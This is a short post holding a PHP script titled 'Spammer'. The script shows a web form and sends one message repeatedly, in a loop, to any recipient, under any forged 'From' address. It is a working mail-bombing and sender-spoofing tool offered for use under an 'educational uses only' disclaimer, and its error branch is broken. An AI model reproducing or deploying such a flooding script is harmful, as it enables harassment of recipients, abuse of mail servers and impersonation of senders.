קוד HTML:<? // Made By David Berlin // Terms: // All use of this script // is for educational uses only! // Builder will not be responsible // for the use of this script // // By using this script you agree to these // terms. // // http://www.builder.co.il, webmaster@builder.co.il if(isset($num)) { for($i=0; $i<$num; $i++) { $mail = mail($to,$subject,$message,"From:\t $from"); } if($mail) { echo "Sent!<br><a href=\"http://www.builder.co.il\">Builder.co.il Script</a><br><BR>"; } else { "error."; } } else { ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Spammer</title> </head> <body> <form action=<? echo $PHP_SELF; ?> method="post"> To: <input type="text" name="to"><br> From: <input type="text" name="from"><br> <br>Subject: <input type="text" name="subject"><br> Message:<br> <textarea name="message" rows=12 cols=30></textarea><br><br> No' of email's: <input type="text" name="num"><br><br> <input type="submit"> </form> <br><br><br> </body> </html> <? } ?>






